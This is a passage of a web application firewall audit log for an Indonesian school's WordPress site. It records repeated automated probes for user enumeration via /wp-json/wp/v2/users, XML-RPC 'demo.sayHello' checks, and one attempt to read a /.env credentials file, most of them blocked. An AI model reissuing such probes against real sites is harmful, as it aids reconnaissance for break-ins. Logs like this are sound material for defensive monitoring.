"/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676943302464 4636 (- - -) Stopwatch2: 1746676943302464 4636; combined=3641, p1=430, p2=3013, p3=22, p4=25, p5=89, sr=64, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a6eed08-Z-- --cfc46d69-A-- [08/May/2025:11:02:26 +0700] aBws0sP9GxxPAbCroFbNGgAAAFE 103.236.140.4 43840 103.236.140.4 8181 --cfc46d69-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.158 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.158 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cfc46d69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfc46d69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676946564167 2392 (- - -) Stopwatch2: 1746676946564167 2392; combined=1063, p1=366, p2=662, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfc46d69-Z-- --242f4022-A-- [08/May/2025:11:02:29 +0700] aBws1acs1DvJ_HgMHE_yMwAAABY 103.236.140.4 43846 103.236.140.4 8181 --242f4022-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.158 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.158 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --242f4022-C-- demo.sayHello --242f4022-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --242f4022-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676949955854 5015 (- - -) Stopwatch2: 1746676949955854 5015; combined=3875, p1=450, p2=3215, p3=21, p4=24, p5=95, sr=67, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --242f4022-Z-- --1c869f6b-A-- [08/May/2025:11:03:09 +0700] aBws_acs1DvJ_HgMHE_yNAAAAAA 103.236.140.4 43850 103.236.140.4 8181 --1c869f6b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1c869f6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c869f6b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676989398406 3635 (- - -) Stopwatch2: 1746676989398406 3635; combined=1548, p1=515, p2=996, p3=0, p4=0, p5=37, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c869f6b-Z-- --e4a4b937-A-- [08/May/2025:11:03:12 +0700] aBwtAMP9GxxPAbCroFbNHAAAAFU 103.236.140.4 43856 103.236.140.4 8181 --e4a4b937-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.86 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e4a4b937-C-- demo.sayHello --e4a4b937-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4a4b937-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676992763041 5207 (- - -) Stopwatch2: 1746676992763041 5207; combined=3887, p1=520, p2=3154, p3=28, p4=32, p5=91, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4a4b937-Z-- --0618df5b-A-- [08/May/2025:11:04:28 +0700] aBwtTKcs1DvJ_HgMHE_yOAAAABg 103.236.140.4 43862 103.236.140.4 8181 --0618df5b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 209.38.88.126 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 209.38.88.126 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --0618df5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0618df5b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746677068820018 794 (- - -) Stopwatch2: 1746677068820018 794; combined=335, p1=294, p2=0, p3=0, p4=0, p5=41, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0618df5b-Z-- --614caf73-A-- [08/May/2025:11:04:48 +0700] aBwtYKcs1DvJ_HgMHE_yOgAAAAU 103.236.140.4 43866 103.236.140.4 8181 --614caf73-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --614caf73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --614caf73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677088413153 2959 (- - -) Stopwatch2: 1746677088413153 2959; combined=1221, p1=419, p2=773, p3=0, p4=0, p5=29, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --614caf73-Z-- --b993be7e-A-- [08/May/2025:11:04:50 +0700] aBwtYqcs1DvJ_HgMHE_yPAAAAAM 103.236.140.4 43870 103.236.140.4 8181 --b993be7e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b993be7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b993be7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677090265295 2222 (- - -) Stopwatch2: 1746677090265295 2222; combined=1012, p1=322, p2=648, p3=0, p4=0, p5=41, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b993be7e-Z-- --a73c1a7c-A-- [08/May/2025:11:04:50 +0700] aBwtYsP9GxxPAbCroFbNHQAAAFI 103.236.140.4 43872 103.236.140.4 8181 --a73c1a7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.189 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a73c1a7c-C-- demo.sayHello --a73c1a7c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a73c1a7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677090674786 5479 (- - -) Stopwatch2: 1746677090674786 5479; combined=4127, p1=557, p2=3353, p3=30, p4=31, p5=93, sr=86, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a73c1a7c-Z-- --9786a925-A-- [08/May/2025:11:04:53 +0700] aBwtZSs5rYyn3jlLjjK_dQAAANA 103.236.140.4 43878 103.236.140.4 8181 --9786a925-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9786a925-C-- demo.sayHello --9786a925-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9786a925-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677093115651 4739 (- - -) Stopwatch2: 1746677093115651 4739; combined=3682, p1=465, p2=2981, p3=22, p4=26, p5=107, sr=68, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9786a925-Z-- --f0173342-A-- [08/May/2025:11:05:18 +0700] aBwtfqcs1DvJ_HgMHE_yPgAAAAo 103.236.140.4 43882 103.236.140.4 8181 --f0173342-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.3 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f0173342-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0173342-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677118643105 3266 (- - -) Stopwatch2: 1746677118643105 3266; combined=1435, p1=493, p2=909, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0173342-Z-- --f2618445-A-- [08/May/2025:11:05:22 +0700] aBwtgqcs1DvJ_HgMHE_yQAAAAAs 103.236.140.4 43886 103.236.140.4 8181 --f2618445-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.3 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f2618445-C-- demo.sayHello --f2618445-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2618445-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677122665087 5474 (- - -) Stopwatch2: 1746677122665087 5474; combined=4034, p1=524, p2=3298, p3=29, p4=31, p5=90, sr=75, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2618445-Z-- --f1e3564a-A-- [08/May/2025:11:05:52 +0700] aBwtoMP9GxxPAbCroFbNIQAAAEo 103.236.140.4 43900 103.236.140.4 8181 --f1e3564a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.68 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f1e3564a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1e3564a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677152261355 2547 (- - -) Stopwatch2: 1746677152261355 2547; combined=1139, p1=367, p2=740, p3=0, p4=0, p5=32, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1e3564a-Z-- --3802bd7a-A-- [08/May/2025:11:05:56 +0700] aBwtpMP9GxxPAbCroFbNIgAAAEE 103.236.140.4 43904 103.236.140.4 8181 --3802bd7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.68 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3802bd7a-C-- demo.sayHello --3802bd7a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3802bd7a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677156198971 3592 (- - -) Stopwatch2: 1746677156198971 3592; combined=2775, p1=341, p2=2282, p3=21, p4=23, p5=64, sr=47, sw=44, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3802bd7a-Z-- --430c360e-A-- [08/May/2025:11:06:05 +0700] aBwtrcP9GxxPAbCroFbNJAAAAEs 103.236.140.4 43908 103.236.140.4 8181 --430c360e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --430c360e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --430c360e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677165719687 3202 (- - -) Stopwatch2: 1746677165719687 3202; combined=1415, p1=492, p2=891, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --430c360e-Z-- --b84ddf71-A-- [08/May/2025:11:06:07 +0700] aBwtrys5rYyn3jlLjjK_dgAAAMc 103.236.140.4 43910 103.236.140.4 8181 --b84ddf71-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b84ddf71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b84ddf71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677167419321 2176 (- - -) Stopwatch2: 1746677167419321 2176; combined=986, p1=346, p2=613, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b84ddf71-Z-- --ebb10559-A-- [08/May/2025:11:06:10 +0700] aBwtsqcs1DvJ_HgMHE_yRAAAABY 103.236.140.4 43916 103.236.140.4 8181 --ebb10559-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.172 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ebb10559-C-- demo.sayHello --ebb10559-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebb10559-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677170168832 4733 (- - -) Stopwatch2: 1746677170168832 4733; combined=3665, p1=462, p2=3006, p3=21, p4=25, p5=88, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebb10559-Z-- --e626eb36-A-- [08/May/2025:11:06:12 +0700] aBwttMP9GxxPAbCroFbNJwAAAEc 103.236.140.4 43918 103.236.140.4 8181 --e626eb36-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.79 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e626eb36-C-- demo.sayHello --e626eb36-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e626eb36-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file 